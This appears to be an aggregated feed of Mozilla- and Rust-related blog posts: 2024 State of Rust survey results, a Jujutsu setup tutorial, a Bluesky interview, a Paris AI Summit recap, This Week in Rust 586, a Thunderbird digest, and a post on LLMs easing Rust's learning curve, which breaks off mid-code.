The State of Rust survey not only gives us excellent insight into how many Rust users around the world are using and experiencing the language but also gives us insight into the makeup of our global community. This information gives us a sense of where the language is being used and where access gaps might exist for us to address over time. We hope that this data and our related analysis help further important discussions about how we can continue to prioritize global access and inclusivity in the Rust community.

Same as every year, we asked our respondents which country they live in. The top 10 countries represented were, in order: United States (22%), Germany (14%), United Kingdom (6%), France (6%), China (5%), Canada (3%), Netherlands (3%), Russia (3%), Australia (2%), and Sweden (2%). We are happy to see that Rust is enjoyed by users from all around the world! You can try to find your country in the chart below:

We also asked whether respondents consider themselves members of a marginalized community. Out of those who answered, 74.5% selected no, 15.5% selected yes, and 10% preferred not to say.

We asked the group that selected “yes” which specific groups they identified as being a member of. The majority of those who consider themselves a member of an underrepresented or marginalized group in technology identify as lesbian, gay, bisexual, or otherwise non-heterosexual. The second most selected option was neurodivergent at 46%, followed by trans at 35%.

[Chart: which marginalized group]

Each year, we must acknowledge the diversity, equity, and inclusivity (DEI) related gaps in the Rust community and open source as a whole. We believe that excellent work is underway at the Rust Foundation to advance global access to Rust community gatherings and distribute grants to a diverse pool of maintainers each cycle, which you can learn more about here. Even so, global inclusion and access is just one element of DEI, and the survey working group will continue to advocate for progress in this domain.

Rust usage

The number of respondents that self-identify as a Rust user was quite similar to last year, around 92%. This high number is not surprising, since we primarily target existing Rust developers with this survey.

Similarly to last year, around 31% of those who did not identify as Rust users cited the perception of difficulty as the primary reason for not using Rust. The most common reason for not using Rust was that the respondents simply haven’t had the chance to try it yet.

[Chart: why don't you use Rust]

Of the former Rust users who participated in the 2024 survey, 36% cited factors outside their control as a reason why they no longer use Rust, which is a 10pp decrease from last year. This year, we also asked respondents if they would consider using Rust again if an opportunity comes up, which turns out to be true for a large fraction of the respondents (63%). That is good to hear!

[Chart: why did you stop using Rust]

Closed answers marked with N/A were not present in the previous version(s) of the survey.

Those not using Rust anymore told us that it is because they don't really need it (or the goals of their company changed) or because it was not the right tool for the job. A few reported being overwhelmed by the language or its ecosystem in general or that switching to or introducing Rust would have been too expensive in terms of human effort.

Of those who used Rust in 2024, 53% did so on a daily (or nearly daily) basis — an increase of 4pp from the previous year. We can observe an upward trend in the frequency of Rust usage over the past few years, which suggests that Rust is being increasingly used at work. This is also confirmed by other answers mentioned in the Rust at Work section later below.

[Chart: how often do you use Rust]

Rust expertise is also continually increasing amongst our respondents! 20% of respondents can write (only) simple programs in Rust (a decrease of 3pp from 2023), while 53% consider themselves productive using Rust — up from 47% in 2023. While the survey is just one tool to measure the changes in Rust expertise overall, these numbers are heartening as they represent knowledge growth for many Rustaceans returning to the survey year over year.

[Chart: how would you rate your Rust expertise]

Unsurprisingly, the most popular version of Rust is latest stable, either the most recent one or whichever comes with the users' Linux distribution. Almost a third of users also use the latest nightly release, due to various reasons (see below). However, it seems that the beta toolchain is not used much, which is a bit unfortunate. We would like to encourage Rust users to use the beta toolchain more (e.g. in CI environments) to help test soon-to-be stabilized versions of Rust.
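Trying the beta toolchain in CI is a small change; with rustup the core of it is roughly the following (exact job wiring depends on your CI system):

```shell
# Install the beta toolchain alongside stable and run the test suite with it.
rustup toolchain install beta
cargo +beta test
```

Running this as an allowed-to-fail CI job catches regressions in soon-to-be-stable Rust before they ship.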

[Chart: which version of Rust do you use]

People that use the nightly toolchain mostly do it to gain access to specific unstable language features. Several users have also mentioned that rustfmt works better for them on nightly or that they use the nightly compiler because of faster compilation times.

[Chart: if you use nightly, why]

Learning Rust

To use Rust, programmers first have to learn it, so we are always interested in finding out how they approach that. Based on the survey results, it seems that most users learn from Rust documentation and also from The Rust Programming Language book, which has been a favourite learning resource of new Rustaceans for a long time. Many people also seem to learn by reading the source code of Rust crates. The fact that both the documentation and source code of tens of thousands of Rust crates is available on docs.rs and GitHub makes this easier.

[Chart: what kind of learning materials have you consumed]

In terms of answers belonging to the "Other" category, they can be clustered into three categories: people using LLM (large language model) assistants (Copilot, ChatGPT, Claude, etc.), reading the official Rust forums (Discord, URLO) or being mentored while contributing to Rust projects. We would like to extend a big thank you to those making our spaces friendly and welcoming for newcomers, as it is important work and it pays off. Interestingly, a non-trivial number of people "learned by doing" and used rustc error messages and clippy as a guide, which is a good indicator of the quality of Rust diagnostics.

In terms of formal education, it seems that Rust has not yet penetrated university curriculums, as this is typically a very slowly moving area. Only a very small number of respondents (around 3%) have taken a university Rust course or used university learning materials.

[Chart: have you taken a Rust course]

Programming environment

In terms of operating systems used by Rustaceans, Linux was the most popular choice, and it seems that it is getting increasingly popular year after year. It is followed by macOS and Windows, which have a very similar share of usage.

As you can see in the wordcloud, there are also a few users that prefer Arch, btw.

Rust programmers target a diverse set of platforms with their Rust programs. We saw a slight uptick in users targeting embedded and mobile platforms, but otherwise the distribution of platforms stayed mostly the same as last year. Since the WebAssembly target is quite diverse, we have split it into two separate categories this time. Based on the results it is clear that when using WebAssembly, it is mostly in the context of browsers (23%) rather than other use-cases (7%).

[Chart: which OS do you target]

We cannot of course forget the favourite topic of many programmers: which IDE (developer environment) they use. Although Visual Studio Code still remains the most popular option, its share has dropped by 5pp this year. On the other hand, the Zed editor seems to have gained considerable traction recently. The small percentage of those who selected "Other" are using a wide range of different tools: from CursorAI to classics like Kate or Notepad++. Special mention to the 3 people using "ed", that's quite an achievement.

[Chart: what IDE do you use]

You can also take a look at the linked wordcloud that summarizes open answers to this question (the "Other" category), to see what other editors are also popular.

Rust at Work

We were excited to see that more and more people use Rust at work for the majority of their coding, 38% vs 34% from last year. There is a clear upward trend in this metric over the past few years.

The usage of Rust within companies also seems to be rising, as 45% of respondents answered that their organisation makes non-trivial use of Rust, which is a 7pp increase from 2023.

[Chart: how is Rust used at your organization]

Once again, the top reason employers of our survey respondents invested in Rust was the ability to build relatively correct and bug-free software. The second most popular reason was Rust’s performance characteristics. 21% of respondents that use Rust at work do so because they already know it, and it's thus their default choice, an uptick of 5pp from 2023. This seems to suggest that Rust is becoming one of the baseline languages of choice for more and more companies.

[Chart: why you use Rust at work]

Similarly to the previous year, a large percentage of respondents (82%) report that Rust helped their company achieve its goals. In general, it seems that programmers and companies are quite happy with their usage of Rust, which is great!

[Chart: which statements apply to Rust at work]

In terms of technology domains, the situation is quite similar to the previous year. Rust seems to be especially popular for creating server backends, web and networking services and cloud technologies. It also seems to be gaining more traction for embedded use-cases.

[Chart: technology domain]

You can scroll the chart to the right to see more domains. Note that the Automotive domain was not offered as a closed answer in the 2023 survey (it was merely entered through open answers), which might explain the large jump.

It is exciting to see the continued growth of professional Rust usage and the confidence so many users feel in its performance, control, security and safety, enjoyability, and more!

Challenges

As always, one of the main goals of the State of Rust survey is to shed light on challenges, concerns, and priorities on Rustaceans’ minds over the past year.

We have asked our users about aspects of Rust that limit their productivity. Perhaps unsurprisingly, slow compilation was at the top of the list, as it seems to be a perennial concern of Rust users. As always, there are efforts underway to improve the speed of the compiler, such as enabling the parallel frontend or switching to a faster linker by default. We invite you to test these improvements and let us know if you encounter any issues.

Other challenges included subpar support for debugging Rust and high disk usage of Rust compiler artifacts. On the other hand, most Rust users seem to be very happy with its runtime performance, the correctness and stability of the compiler and also Rust's documentation.

[Chart: which problems limit your productivity]

In terms of specific unstable (or missing) features that Rust users want to be stabilized (or implemented), the most desired ones were async closures and if/while let chains. Well, we have good news! Async closures will be stabilized in the next version of Rust (1.85), and if/while let chains will hopefully follow soon after, once Edition 2024 is released (which will also happen in Rust 1.85).

Other coveted features are generators (both sync and async) and more powerful generic const expressions. You can follow the Rust Project Goals to track the progress of these (and other) features.

[Chart: which features do you want stabilized]

In the open answers to this question, people were really helpful and tried hard to describe the most notable issues limiting their productivity. We have seen mentions of struggles with async programming (an all-time favourite), debuggability of errors (which people generally love, but they are not perfect for everyone) or Rust tooling being slow or resource intensive (rust-analyzer and rustfmt). Some users also want a better IDE story and improved interoperability with other languages.

This year, we have also included a new question about the speed of Rust's evolution. While most people seem to be content with the status quo, more than a quarter of people who responded to this question would like Rust to stabilize and/or add features more quickly, and only 7% of respondents would prefer Rust to slow down or completely stop adding new features.

[Chart: what do you think about Rust evolution]

Interestingly, when we asked respondents about their main worries for the future of Rust, one of the top answers remained the worry that Rust will become too complex. This seems to be in contrast with the answers to the previous question. Perhaps Rust users consider the complexity of Rust manageable today, but worry that one day it might become too much.

We are happy to see that the number of respondents concerned about Rust Project governance and insufficient support from the Rust Foundation has dropped by about 6pp from 2023.

[Chart: what are your biggest worries about Rust]

Looking ahead

Each year, the results of the State of Rust survey help reveal the areas that need improvement across the Rust Project and ecosystem, as well as the aspects that are working well for our community.

If you have any suggestions for the Rust Annual survey, please let us know!

We are immensely grateful to those who participated in the 2024 State of Rust Survey and facilitated its creation. While there are always challenges associated with developing and maintaining a programming language, this year we were pleased to see a high level of survey participation and candid feedback that will truly help us make Rust work better for everyone.

If you’d like to dig into more details, we recommend browsing through the full survey report.

Andrew HalberstadtUsing Jujutsu With Mozilla Unified

With Mozilla’s migration from hg.mozilla.org to Github drawing near, the clock is ticking for developers still using Mercurial to find their new workflow. I previously blogged about how Jujutsu can help here, so please check that post out first if you aren’t sure what Jujutsu is, or whether it’s right for you. If you know you want to give it a shot, read on for a tutorial on how to get everything set up!

We’ll start with an existing Mercurial clone of mozilla-unified, convert it to use git-cinnabar and then set up Jujutsu using the co-located repo method. Finally I’ll cover some tips and tricks for using some of the tooling that relies on version control.
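At a high level, and hedging that the exact commands are covered in the tutorial itself, the flow is roughly: obtain a git-cinnabar-backed Git clone, then initialize Jujutsu alongside it as a co-located repo:

```shell
# Clone mozilla-unified through git-cinnabar (the hg:: prefix tells
# git-cinnabar to translate between Mercurial and Git).
git clone hg::https://hg.mozilla.org/mozilla-unified unified
cd unified

# Create a co-located Jujutsu repo on top of the existing Git clone,
# so jj and git commands can be used interchangeably in the same checkout.
jj git init --colocate
```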

The Mozilla BlogBluesky’s Emily Liu on rethinking social media (and why it’s time to chime in)

[Image: A smiling woman in a brown jacket stands on a busy city street, overlaid with a blue digital grid background and speech bubble icons.] Emily Liu is the head of special projects at Bluesky.

Here at Mozilla, we are the first to admit the internet isn’t perfect, but we know the internet is pretty darn magical. The internet opens up doors and opportunities, allows for human connection, and lets everyone find where they belong — their corners of the internet. We all have an internet story worth sharing. In My Corner Of The Internet, we talk with people about the online spaces they can’t get enough of, the sites and forums that shaped them, and how they would design their own corner of the web.

We caught up with Emily Liu, head of special projects at Bluesky, as the open-source platform celebrates its first year launching to the public (you can follow Firefox on Bluesky here). She talks about how social media has changed over the last decade, her love for public forums and how her path started with a glitter cursor. 

What is your favorite corner of the internet? 

I’m at the two extremes on the spectrum of private to public content: 

Firstly, I love a good iMessage group text, especially when it’s moving at 100 miles per hour. I strongly believe that everyone needs a good group chat.

At the same time, I love public web forums. This feels like something that’s increasingly rare on the internet as more of us move to private group apps, and I worry that this is equivalent to pulling the ladder up behind us for those who haven’t found those private spaces yet. So I try to do my part by chiming in on public forums when I can offer something useful.

What is the one tab you always regret closing?

I live by Google Calendar and have widgets for it on probably every digital surface — my desktop, my phone lock screen, my laptop side menu, and of course, multiple tabs simultaneously. If something’s not on my calendar, it’s probably not happening.

What can you not stop talking about on the internet right now?

I’m super excited about Bluesky. Obviously I’m unbiased (I work here). We launched the Bluesky app publicly just in February 2024, and in under a year, we crossed 30M people on the network. But the real measure of Bluesky’s growth is that my family has started sending me news articles and asking, “Hey, isn’t this where you work?”

Social networks have become vital public infrastructure, whether it’s to get the latest breaking news, find jobs and opportunities, or stay in touch with our friends and family. Yet over the last decade, closed networks have locked users in, preventing competition and innovation in social media as their services deteriorate. On the other hand, Bluesky is both a social app where your experience online is yours to customize, and an open network that reintroduces competition to social media. This also means that the social network isn’t defined by whoever the CEO is, however capricious they might be.

What was the first online community you engaged with?

In middle school, I ran an anonymous fashion blog on Tumblr. This was before Tumblr had group chats, so internet friends and I co-opted the product by creating a makeshift group DM — a private blog with multiple owners, where every message we sent was really just a post on a private blog. Where there is a will, there is a way, and people are infinitely creative; this is where I learned that the product you design may not be the product that users adopt.

Tumblr was also where I wrote my first lines of code out of desperation for a better blog theme than what the default marketplace provided. Who would’ve thought that adding a visitor counter and a glitter cursor would’ve led me to this point!

If you could create your own corner of the internet, what would it look like?

I feel lucky that in a sense, I am doing this right now through Bluesky. On one hand, there’s the Bluesky app itself. There’s still a bunch of low-hanging fruit to reach feature parity with other social networks, but on top of that, I’m excited about tweaks that might make social media less of a “torment nexus” that other apps haven’t tried yet. Maybe I shouldn’t share them here just yet since I know a certain other company likes to implement Bluesky’s ideas. 😉

And on the other hand, Bluesky is already so customizable that I can configure my experience to be what I want. For example, I’m a big fan of the Quiet Posters custom feed, which shows you posts from people you follow who don’t often post that much, giving you a cozier feel of the network.

What articles and/or videos are you waiting to read/watch right now?

I have so many open tabs and unread newsletters about China and AI that I need to get to.

What role do you see open web projects like Bluesky playing in shaping the future of the web?

I see Bluesky as just one contributor in the mission of building an open web — we’re not the first project to build an open social network, and we won’t be the last. The collaboration and constructive criticism from other players has been immensely useful. Recently, some independent groups have begun building alternative ATProto infrastructure, which I’m particularly excited about. (ATProto, or the AT Protocol, is the open standard that Bluesky is built upon.) Bluesky’s vision of a decentralized and open social web only comes to fruition when users actually have alternatives to choose from, so I’m rooting for all of these projects too.


Emily Liu is the head of special projects at Bluesky, an open social network that gives creators independence from platforms, developers the freedom to build, and users a choice in their experience. Previously, Emily built election models and visualizations at The Washington Post, archival tooling at The New York Times, and automated fact-checking at the Duke Reporters’ Lab.

The post Bluesky’s Emily Liu on rethinking social media (and why it’s time to chime in) appeared first on The Mozilla Blog.

The Mozilla BlogParis AI Action Summit: A milestone for open and Public AI

As we close out the Paris AI Action Summit, one thing is clear: the conversation around open and Public AI is evolving—and gaining real momentum. Just over a year ago at Bletchley Park, open source AI was framed as a risk. In Paris, we saw a major shift. There is now a growing recognition that openness isn’t just compatible with AI safety and advancing public interest AI—it’s essential to it.

We have been vocal supporters of an ecosystem grounded in open competition and trustworthy AI—one where innovation isn’t walled off by dominant players or concentrated in a single geography. Mozilla, therefore, came to this Summit with a clear and urgent message: AI must be open, human-centered, and built for the public good. And across discussions, that message resonated.

Open source AI is entering the conversation in a big way

Two particularly notable moments stood out:

  • European Commission President Ursula von der Leyen spoke about Europe’s “distinctive approach to AI,” emphasizing collaborative, open-source solutions as a path forward.
  • India’s Prime Minister Narendra Modi reinforced this vision, calling for open source AI systems to enhance trust and transparency, reduce bias, and democratize technology.

These aren’t just words. The investments and initiatives announced at this Summit mark a real turning point. From the launch of Current AI, an initial $400M public interest AI partnership supporting open source development, to ROOST, a new nonprofit making AI safety tools open and accessible, to the €109 billion investment in AI computing infrastructure announced by President Macron, the momentum is clear. Add to that strong signals from the EU and India, and this Summit stands out as one of the most positive and proactive international gatherings on AI so far.

At the heart of this is Public AI—the idea that we need infrastructure beyond private, purely profit-driven AI. That means building AI that serves society and promotes true innovation even when it doesn’t fit neatly into short-term business incentives. The conversations in Paris show that we’re making progress, but there’s more work to do.

Looking ahead to the next AI summit

Momentum is building, and we must forge onward. The next AI Summit in India will be a critical moment to review the progress on these announcements and ensure organizations like Mozilla—those fighting for open and Public AI infrastructure—have a seat at the table.

Mozilla is committed to turning this vision into reality—no longer a distant, abstract idea, but a movement already in motion.

A huge thanks to the organizers, partners, and global leaders driving this conversation forward. Let’s keep pushing for AI that serves humanity—not the other way around.

––Mitchell Baker
Chairwoman, Mozilla
Paris AI Action Summit Steering Committee Member

The post Paris AI Action Summit: A milestone for open and Public AI appeared first on The Mozilla Blog.

This Week In RustThis Week in Rust 586

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
FOSDEM
Miscellaneous

Crate of the Week

This week's crate is esp32-mender-client, a client for ESP32 to execute firmware updates and remote commands.

Thanks to Kelvin for the self-suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

462 pull requests were merged in the last week

Rust Compiler Performance Triage

A relatively neutral week, with lots of real changes but most small in magnitude. The most significant change is rustdoc's move of JS/CSS minification to build time, which cut doc generation times fairly significantly on most benchmarks.

Triage done by @simulacrum. Revision range: 01e4f19c..c03c38d5

3 Regressions, 5 Improvements, 1 Mixed; 2 of them in rollups. 32 artifact comparisons made in total.

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
Rust
Cargo
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Team
  • No Language Team Proposals entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-02-12 - 2025-03-12 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

Just because things are useful doesn't mean they are magically sound.

Ralf Jung on github

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, U007D, joelmarcey, mariannegoldin, bennyvasquez, bdillo

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Mozilla ThunderbirdThunderbird Monthly Development Digest – January 2025

Hello again Thunderbird Community! As January drew to a close, the team was closing in on the completion of some important milestones. Additionally, we had scoped work for our main Q1 priorities. Those efforts are now underway and it feels great to cross things off the list and start tackling new challenges.

As always, you can catch up on all of our previous digests and updates.

FOSDEM – Inspiration, collaboration and education

A modest contingent from the Thunderbird team joined our Mozilla counterparts for an educational and inspiring weekend at FOSDEM recently. We talked about standards, problems, solutions and everything in between. However, the most satisfying part of the weekend was standing at the Thunderbird booth and hearing the gratitude, suggestions and support from so many users.

With such important discussions among leading voices, we’re keen to help in finding or implementing solutions to some of the meatier topics such as:

  • OAuth 2.0 Dynamic Client Registration Protocol
  • Support for unicode email addresses
  • Support for OpenPGP certification authorities and trust delegation

Exchange Web Services support in Rust

Despite a reduction in team capacity for part of January, the team was able to complete work on the following tasks, which form some of the final stages of our 0.2 release:

  • Folder compaction
  • Saving attachments to disk
  • Download EWS messages in an nsIChannel

Keep track of feature delivery here.

Account Hub

We completed the second and final milestone in the First Time User Experience for email configuration via the enhanced Account Hub over the course of January. Tasks included density and font awareness, refactoring of state management, OAuth prompts, enhanced error handling and more which can be followed via Meta bug & progress tracking. Watch out for this feature being unveiled in daily and beta in the coming weeks!

Global Message Database

With a significant number of the research and prototyping tasks now behind us, the project has taken shape over the course of January with milestones and tasks mapped out. Recent progress has been related to live view, sorting and support for Unicode server and folder names. 

Next up is to finally crack the problem of “non-unique unique IDs” mentioned previously, which is important preparatory groundwork required for a clean database migration. 

In-App Notifications

Phase 2 is now complete, and almost ready for uplift to ESR, pending underlying Firefox dependencies scheduled in early March. Features and user stories in the latest milestone include a cache-control mechanism, a thorough accessibility review, schema changes and the addition of guard rails to limit notification frequency. Meta Bug & progress tracking.

New Features Landing Soon

Several requested features and fixes have reached our Daily users and include…

To see things as they land, and help squash early bugs, you can check the pushlog and try running daily. This would be immensely helpful for catching things early.

Toby Pilling
Senior Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest – January 2025 appeared first on The Thunderbird Blog.

Niko MatsakisHow I learned to stop worrying and love the LLM

I believe that AI-powered development tools can be a game changer for Rust—and vice versa. At its core, my argument is simple: AI’s ability to explain and diagnose problems with rich context can help people get over the initial bump of learning Rust in a way that canned diagnostics never could, no matter how hard we try. At the same time, rich type systems like Rust’s give AIs a lot to work with, which could be used to help them avoid hallucinations and validate their output. This post elaborates on this premise and sketches out some of the places where I think AI could be a powerful boost.

Perceived learning curve is challenge #1 for Rust

Is Rust good for every project? No, of course not. But it’s absolutely great for some things—specifically, building reliable, robust software that performs well at scale. This is no accident. Rust’s design is intended to surface important design questions (often in the form of type errors) and to give users the control to fix them in whatever way is best.

But this same strength is also Rust’s biggest challenge. Talking to people within Amazon about adopting Rust, perceived complexity and fear of its learning curve is the biggest hurdle. Most people will say, “Rust seems interesting, but I don’t need it for this problem”. And you know, they’re right! They don’t need it. But that doesn’t mean they wouldn’t benefit from it.

One of Rust’s big surprises is that, once you get used to it, it’s “surprisingly decent” at a very large number of things beyond what it was designed for. Simple business logic and scripts can be very pleasant in Rust. But the phrase “once you get used to it” in that sentence is key, since most people’s initial experience with Rust is confusion and frustration.

Rust likes to tell you no (but it’s for your own good)

Some languages are geared to say yes—that is, given any program, they aim to run it and do something. JavaScript is of course the most extreme example (no semicolons? no problem!) but every language does this to some degree. It’s often quite elegant. Consider how, in Python, you write vec[-1] to get the last element in the list: super handy!

Rust is not (usually) like this. Rust is geared to say no. The compiler is just itching for a reason to reject your program. It’s not that Rust is mean: Rust just wants your program to be as good as it can be. So we try to make sure that your program will do what you want (and not just what you asked for). This is why vec[-1], in Rust, will panic: sure, giving you the last element might be convenient, but how do we know you didn’t have an off-by-one bug that resulted in that negative index?1
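To make the contrast concrete, here is a small sketch (my example, not from the post) of the explicit ways Rust asks you to get the last element, each of which keeps the empty-vector and off-by-one risks visible:

```rust
fn main() {
    let v = vec![10, 20, 30];

    // `last()` returns an Option, so the empty case must be handled:
    assert_eq!(v.last(), Some(&30));
    assert_eq!(Vec::<i32>::new().last(), None);

    // Computing the index by hand keeps the off-by-one risk visible:
    assert_eq!(v[v.len() - 1], 30);

    // An out-of-bounds index like `v[3]` panics at runtime rather than
    // silently wrapping around the way Python's negative indexing does.
}
```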

But that tendency to say no means that early learning can be pretty frustrating. For most people, the reward from programming comes from seeing their program run—and with Rust, there are a lot of niggling details to get right before your program will run. What’s worse, while those details are often motivated by deep properties of your program (like data races), the way they are presented is as the violation of obscure rules, and the solution (“add a *”) can feel random.

Once you get the hang of it, Rust feels great, but getting there can be a pain. I heard a great phrase from someone at Amazon to describe this: “Rust: the language where you get the hangover first”.3

AI today helps soften the learning curve

My favorite thing about working at Amazon is getting the chance to talk to developers early in their Rust journey. Lately I’ve noticed an increasing trend—most are using Q Developer. Over the last year, Amazon has been doing a lot of internal promotion of Q Developer, so that in and of itself is no surprise, but what did surprise me a bit is hearing from developers the way that they use it.

For most of them, the most valuable part of Q Dev is not authoring code but rather explaining it. They ask it questions like “why does this function take an &T and not an Arc<T>?” or “what happens when I move a value from one place to another?”. Effectively, the LLM becomes an ever-present, ever-patient teacher.4

Scaling up the Rust expert

Some time back I sat down with an engineer learning Rust at Amazon. They asked me about an error they were getting that they didn’t understand. “The compiler is telling me something about ‘static, what does that mean?” Their code looked something like this:

async fn log_request_in_background(message: &str) {
    tokio::spawn(async move {
        log_request(message);
    });
}

And the compiler was telling them:

error[E0521]: borrowed data escapes outside of function
 --> src/lib.rs:2:5
  |
1 |   async fn log_request_in_background(message: &str) {
  |                                      -------  - let's call the lifetime of this reference `'1`
  |                                      |
  |                                      `message` is a reference that is only valid in the function body
2 | /     tokio::spawn(async move {
3 | |         log_request(message);
4 | |     });
  | |      ^
  | |      |
  | |______`message` escapes the function body here
  |        argument requires that `'1` must outlive `'static`

This is a pretty good error message! And yet it requires significant context to understand it (not to mention scrolling horizontally, sheesh). For example, what is “borrowed data”? What does it mean for said data to “escape”? What is a “lifetime” and what does it mean that “'1 must outlive 'static”? Even assuming you get the basic point of the message, what should you do about it?

The fix is easy… if you know what to do

Ultimately, the answer to the engineer’s problem was just to insert a call to clone5. But deciding on that fix requires a surprisingly large amount of context. In order to figure out the right next step, I first explained to the engineer that this confusing error is, in fact, what it feels like when Rust saves your bacon, and talked them through how the ownership model works and what it means to free memory. We then discussed why they were spawning a task in the first place (the answer: to avoid the latency of logging)—after all, the right fix might be to just not spawn at all, or to use something like rayon to block the function until the work is done.

Once we established that the task needed to run asynchronously from its parent, and hence had to own the data, we looked into changing the log_request_in_background function to take an Arc<String> so that it could avoid a deep clone. This would be more efficient, but only if the caller themselves could cache the Arc<String> somewhere. It turned out that the origin of this string was in another team’s code and that this code only returned an &str. Refactoring that code would probably be the best long term fix, but given that the strings were expected to be quite short, we opted to just clone the string.
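For the record, the cloning fix looks roughly like this. This is a sketch: I use std::thread rather than tokio so the snippet is dependency-free, and the logging function is a hypothetical stand-in, but the ownership story is the same.

```rust
use std::thread;

// Hypothetical stand-in for the real logging call in the post.
fn log_request(message: &str) {
    println!("logged: {message}");
}

fn log_request_in_background(message: &str) -> thread::JoinHandle<()> {
    // The fix: clone the borrowed data so the spawned task owns its own
    // String and no longer borrows from the caller's stack frame.
    let owned = message.to_owned();
    thread::spawn(move || log_request(&owned))
}

fn main() {
    log_request_in_background("GET /index.html").join().unwrap();
}
```

Because the closure captures an owned `String`, nothing in the task borrows data tied to the caller's lifetime, which is exactly what the `'static` bound on spawn was demanding.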

You can learn a lot from a Rust error

An error message is often your first and best chance to teach somebody something.—Esteban Küber (paraphrased)

Working through this error was valuable. It gave me a chance to teach this engineer a number of concepts. I think it demonstrates a bit of Rust’s promise—the idea that learning Rust will make you a better programmer overall, regardless of whether you are using Rust or not.

Despite all the work we have put into our compiler error messages, this kind of detailed discussion is clearly something that we could never achieve. It’s not because we don’t want to! The original concept for --explain, for example, was to present a customized explanation of each error, tailored to the user’s code. But we could never figure out how to implement that.

And yet tailored, in-depth explanation is absolutely something an LLM could do. In fact, it’s something they already do, at least some of the time—though in my experience the existing code assistants don’t do nearly as good a job with Rust as they could.

What makes a good AI opportunity?

Emery Berger is a professor at UMass Amherst who has been exploring how LLMs can improve the software development experience. Emery emphasizes how AI can help close the gap from “tool to goal”. In short, today’s tools (error messages, debuggers, profilers) tell us things about our program, but they stop there. Except in simple cases, they can’t help us figure out what to do about it—and this is where AI comes in.

When I say AI, I am not talking (just) about chatbots. I am talking about programs that weave LLMs into the process, using them to make heuristic choices or proffer explanations and guidance to the user. Modern LLMs can also do more than just rely on their training and the prompt: they can be given access to APIs that let them query and get up-to-date data.

I think AI will be most useful in cases where solving the problem requires external context not available within the program itself. Think back to my explanation of the 'static error, where knowing the right answer depended on how easy/hard it would be to change other APIs.

Where I think Rust should leverage AI

I’ve thought about a lot of places I think AI could help make working in Rust more pleasant. Here is a selection.

Deciding whether to change the function body or its signature

Consider this code:

fn get_first_name(&self, alias: &str) -> &str {
    alias
}

This function will give a type error, because the signature (thanks to lifetime elision) promises to return a string borrowed from self but actually returns a string borrowed from alias. Now…what is the right fix? It’s very hard to tell in isolation! It may be that in fact the code was meant to be &self.name (in which case the current signature is correct). Or perhaps it was meant to be something that sometimes returns &self.name and sometimes returns alias, in which case the signature of the function was wrong. Today, we take our best guess. But AI could help us offer more nuanced guidance.
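To spell out the two candidate fixes side by side (a sketch; the struct and field names are my invention):

```rust
struct Person {
    name: String,
}

impl Person {
    // Fix 1: keep the elided signature (return borrows from `self`)
    // and change the body to match what the signature promises.
    fn get_first_name_from_self(&self, _alias: &str) -> &str {
        &self.name
    }

    // Fix 2: keep the body and change the signature, tying the return
    // value's lifetime to `alias` instead of `self`.
    fn get_first_name<'a>(&self, alias: &'a str) -> &'a str {
        alias
    }
}

fn main() {
    let p = Person { name: String::from("Niko") };
    assert_eq!(p.get_first_name_from_self("nm"), "Niko");
    assert_eq!(p.get_first_name("nm"), "nm");
}
```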

Translating idioms from one language to another

People often ask me questions like “how do I make a visitor in Rust?” The answer, of course, is “it depends on what you are trying to do”. Much of the time, a Java visitor is better implemented as a Rust enum and match statements, but there is a time and a place for something more like a visitor. Guiding folks through the decision tree for how to do non-trivial mappings is a great place for LLMs.
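As a minimal sketch of the enum-plus-match shape that often replaces a Java visitor (the expression type here is my own toy example):

```rust
// A tiny expression tree. In Java you might walk this with a Visitor
// interface; in Rust an enum plus `match` is usually more direct, and
// the compiler checks that every variant is handled.
enum Expr {
    Num(i64),
    Add(Box<Expr>, Box<Expr>),
    Neg(Box<Expr>),
}

fn eval(e: &Expr) -> i64 {
    match e {
        Expr::Num(n) => *n,
        Expr::Add(a, b) => eval(a) + eval(b),
        Expr::Neg(a) => -eval(a),
    }
}

fn main() {
    // (1 + -(2)) + 40
    let e = Expr::Add(
        Box::new(Expr::Add(
            Box::new(Expr::Num(1)),
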